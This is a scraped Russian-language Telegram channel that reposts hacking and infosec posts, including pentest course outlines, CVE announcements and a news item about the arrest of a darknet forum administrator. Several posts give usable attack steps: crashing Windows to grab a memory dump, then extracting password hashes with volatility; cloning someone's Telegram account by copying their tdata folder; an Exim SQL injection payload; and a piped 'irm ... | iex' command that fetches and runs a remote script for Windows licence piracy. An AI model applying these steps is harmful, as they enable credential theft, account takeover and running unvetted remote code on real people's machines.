Канал ламера
366 subscribers
601 photos
59 videos
494 files
3.38K links
Сборник полезной информации по информационной безопасности, авторским статьям, сливам и обзорам хак-софта с ведущих IT-каналов в ТГ. Подписывайся, ну либо пропускай все самое интересное.
Download Telegram
Forwarded from UnderPrivate
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from DefenseEvasion
This media is not supported in your browser
VIEW IN TELEGRAM
💀 Windows | Get passwords no one notices 🔑

- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)

🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
C:\Windows\MEMORY.DMP file
- So, be the root cause of BSoD — crash the system

🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate C:\WIndows\MEMORY.DMP
3️⃣Launch volatility
py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump


⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP

> Read the full post (more techniques, nuances, detection, hardening)

#redteam #blueteam #credential_access
Forwarded from Life-Hack - Хакер
Наш бесплатный курс "Тестирование на проникновение" подошел к концу. Вот полный список статей, которые помогут вам начать свой путь в #Pentest.

Моделирование атаки - тестрирование на проникновение.
Основные этапы тестирования.
Сбор информации: 1 Часть.
Сбор информации: 2 Часть.
Сбор информации: 3 Часть.
Обнаружение уязвимостей.
Подбор паролей.

Обратные оболочки и полезные нагрузки.
Эксплуатация уязвимостей: 1 Часть.
Эксплуатация уязвимостей: 2 Часть.
Уклонение от средств защиты: 1 Часть.
Уклонение от средств защиты: 2 Часть.
Уклонение от средств защиты: 3 Часть.
С2 (Command and Control) сервер.

Основы Active Directory: 1 Часть.
Основы Active Directory: 2 Часть.
Kerberos, NTLM, DNS, LDAP.
Пользовательские и машинные учетные записи.
Права и привилегии в Active Directory.
Небезопасные права доступа ACL.
Active Directory Domain Enumeration

Bloodhound
AS-REP Roasting
Kerberoasting
Неограниченное делегирование.
Ограниченное делегирование.
Ограниченное делегирование на основе ресурсов.
DCShadow.

Pass-the-hash
Password Spray
Windows Server Update Services (WSUS)
System Center Configuration Manager (SCCM)
Взлом MSSQL
Responder
Netexec

Крадем учетные данные Windows
Zerologon
PetitPotam
Skeleton Key
RouterSploit
Получение DA через принтер
DCSync

SIDHistory
AdminSDHolder
Silver Ticket
Golden Ticket
Diamond Ticket
Sapphire Ticket

Не забывайте делиться нашим бесплатным курсом "Тестирование на проникновение"!

#статья@haccking #обучениеPentest@haccking #AD

LH | Новости | Курсы | OSINT
Forwarded from Life-Hack - Хакер
Whatsapp Mobile Tools

#Whatsapp #OSINT #полезное

Инструмент для извлечения данных профиля пользователя Whatsapp. Позволит узнать публичное имя, статус, изображение профиля, действителен ли номер WhatsApp. Проверку можно осуществлять прямо в браузере, без создания аккаунта в WhatsApp.

Ссылка на сервис

LH | Новости | Курсы | OSINT
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Для изменения пароля пользователя AD, если есть на это право. Утилита написана на С.

https://github.com/decoder-it/ChgPass

#ad #pentest #acl
Forwarded from Cybred
Silently Install Chrome Extension For Persistence

Я занимаюсь Red Team 10 лет и сегодня расскажу, как мне удалось найти способ максимально скрытно установить расширение для Chrome с обходом всех IOC, известных в настоящее время.


Преимущества:
не использует командную строку
оставляет реестр нетронутым
может быть установлен с открытым браузером
стабилен и сохраняет постоянство

research // poc
[ Active Directory Domain Services Elevation of Privilege Vulnerability New — CVE-2025-21293 ]

«Network Configuration Operators» group privilege escalation

CVE: https://www.cve.org/CVERecord?id=CVE-2025-21293

MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21293

Blog with a PoC code: https://birkep.github.io/posts/Windows-LPE
Forwarded from APT
🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754)

A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.

🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754

#windows #anydesk #lpe #cve
👍3
Forwarded from Social Engineering
📦 PwnBox: реализуем устройство для пентеста Wi-Fi сетей.

• Автор этого репозитория собрал устройство, которое отлично подходит для пентеста Wi-Fi сетей. Реализация включает в себя несколько донглов от Alfa, Raspberry Pi, соответствующее ПО и адаптер от BrosTrend. Несмотря на то, что данной реализации уже достаточно лет, логика и схема для создания подобного устройства остается прежней, нужно только поменять донглы от Альфы на наиболее подходящие...

• Кстати, знаете почему вардрайвинга советуют донглы от Alfa Networks? Этот производитель специализируется на беспроводном оборудовании, причем делает его чуть лучше (и дороже) других. Например, во многих адаптерах встречается экранирование (повышает чувствительность приемника) или встроенный усилитель (увеличивает пиковую мощность передатчика). Почти все модели оснащены съемными антеннами (мы можем прикрутить свою, более подходящую). Для удобства выбора есть даже специальный раздел Kali WiFi USB, где указаны адаптеры, гарантированно работающие в Kali Linux в режиме мониторинга. В общем и целом, Альфа - это как бывшая cisco для админов.

https://github.com/koutto/pi-pwnbox

• Дополнительно:

Анализ безопасности Wi-Fi: подробное исследование методологии взлома протоколов WPA2-Personal / Enterprise и WPA3 (какие атаки и уязвимости существуют, и какой инструментарий применяется для их эксплуатации);
Пентест Wi-Fi: полезный чек-лист, который содержит актуальные советы и хитрости на тему пентеста Wi-Fi сетей;
Инструменты для пентеста Wi-Fi: продолжение поста выше, статья включает в себя максимально полный список инструментов для анализа защищенности Wi-Fi;
Useful Wireless Links: учебные пособия, справочники, калькуляторы, софт, гаджеты и многое другое.

S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from TelAnalysis
🛠 Hiren’s BootCD PE – незаменимый инструмент для ИБ, OSINT и системных администраторов

Hiren’s BootCD PE – это мощный загрузочный диск на базе Windows 10 PE, включающий десятки инструментов для диагностики, восстановления данных и безопасности.

🔹 Для сисадминов: тестирование железа, сброс паролей, клонирование дисков.
🔹 Для ИБ-специалистов: анализ дисков, поиск уязвимостей, удаление вредоносного ПО.
🔹 Для OSINT: восстановление удаленных файлов, анализ сетевой активности, forensic-инструменты.
Источник
⚡️ Работает без установки, прямо с флешки – мастхэв в арсенале любого IT-специалиста! 🚀

TelAnalysis
👍1
Forwarded from КиберТопор
Конец лицензионной Windows: хакерская группировка Massgrave выкатила способ взломать Windows раз и навсегда.

Они создали хак на основе эксплойта TSforge, который позволяет активировать любую версию Windows и Office: он обходит защиту и делает активацию вечной.

Что нужно делать:
— Запустить PowerShell от имени администратора;
— Вставить следующую команду: irm https://get.activated.win | iex;
— Запускаем скрипт и радуемся лицензионной винде.


Хак с GitHub забираем отсюда: https://github.com/massgravel/Microsoft-Activation-Scripts.

Разбираемся, как работает TSforge здесь: https://massgrave.dev/blog/tsforge

🕹КиберТопор — Подписаться
Forwarded from SecuriXy.kz
Обнаружена SQLi уязвимость CVE-2025-26794 в #Exim версии 4.98 при использовании сериализации ETRN.


ETRN #',1); ## INSERT SQL HERE ## /*


Для устранения проблемы рекомендуется обновиться до версии 4.98.1.

Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
Forwarded from BEHOLDERISHERE.сonsulting (Beholder Is Here)
This media is not supported in your browser
VIEW IN TELEGRAM
КАК ПОЛУЧИТЬ ДОСТУП К ТЕЛЕГРАМ ПЕРЕПИСКЕ.

Часто так случается, что необходимо получить доступ к чатам и группам сервиса Телеграм. И тут нам очень может повезти, если нам попадает в руки компьютер, на котором может быть установлена десктопная версия Телеграм - клиента.

Для того чтобы нам сделать дубликат телеграм-аккаунта, необходимо найти на компьютере папку находящуюся по пути:

🔻C:\Users\имя пользователя\AppData\Roaming\Telegram Desktop\tdata - если вы в Windows

🔻~/Library/Application Support/Telegram/tdata - если вы в macOS

🔻~/.config/systemd/user/Telegram/tdata или ~/.config/Telegram/tdata - если вы в Linux (в зависимости от дистрибутива)

...и скачать полностью папку tdata.

Далее необходимо скачать портативную версию Телеграм с сайта
А после разархивации архива в любом месте поместить папку tdata в папку с портативной версией Телеграм.

Все! теперь у вас полный дубликат аккаунта.

Так же вы можете воспользоваться парсером который будет отличным подспорьем для исследования пользователей определенного ТГ-аккаунта.

🔴НАПОМИНАНИЕ🔴
Дублирование чужих аккаунтов карается статьей 138 УК РФ. Информация из этого поста дана исключительно в образовательных целях для осуществления ОРМ теми, кому это разрешено законом той страны в которой он это делает.

Обратиться за консультацией | Инструментарий
Forwarded from bin
Арестован администратор крупнейшего ИБ сообщества – XSS.IS

XSS.IS - Администрация арестована Украинскими спец.службами.

В Киеве арестовали админа российского даркнет-форума

В результате длительного расследования, проведенного французскими властями в сотрудничестве украинскими правоохранительными органами и Европолом, был арестован администратор xss.is, одной из самых влиятельных русскоязычных платформ киберпреступности в мире.

За 20 лет своей незаконной деятельности киберпреступник заработал более 7 млн. евро.

По словам инсайдера, операция стала результатом работы французской Brigade de Lutte Contre la Cybercriminalité (BL2C), передавшей СБУ оперативную информацию. В рамках совместной подготовки французские офицеры прибыли в Киев, где сегодня и был проведён экшн-дэй совместно с Департаментом СБУ (Контрразведывательной защиты интересов). Правоохранительные органы конфисковали домены XSS — на момент публикации он недоступен, на ряде доменов отображается сообщение о блокировке.


Насколько это правда или нет неизвестно ⚠️, у меня форум спокойно открывается. Если это действительно так, то я сильно удивлен, ведь манифест форума запрещал работу по странам СНГ и Украине.

Но как мы знаем, Украина это плотное сотрудничество со спец. службами стран Евросоюза в том числе, а значит и администрировать такой ресурс из УА крайне опасно.

Полагаю, будь он в РФ, он был бы в безопасности.

hashbin.t.me
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from bin
bin
Арестован администратор крупнейшего ИБ сообщества – XSS.IS XSS.IS - Администрация арестована Украинскими спец.службами. В Киеве арестовали админа российского даркнет-форума В результате длительного расследования, проведенного французскими властями в сотрудничестве…
– Расследование началось 2 июля 2021 года

– Основной упор был в рансомы, несмотря на запрет этой темы в мае 2021 года

Успех правоохранителей заключался в том, что они смогли взломать Jabber-сервер thesecure.biz и отслеживать все сообщения пользователей

– Этот взлом помог отследить множество эпизодов с рансомами, на основании чего был вывод о заработанных 7 млн. евро администрацией форума

– С сентября 2024 правоохранители уже разрабатывали администратора и знали его личность

– Подозреваемый арестован вчера в Киеве при поддержке Европола

– Есть подозрение на агентуру среди администрации

– XSS может ждать то же, что и было провернуто с BreachForums, когда после взлома пошла волна задержаний по всему миру

– Через TOR вроде пока работает. Может открываться из клира из-за запоздалых DNS

— Комментарий от даталикса: t.me/LeakAlarm/47

hashbin.t.me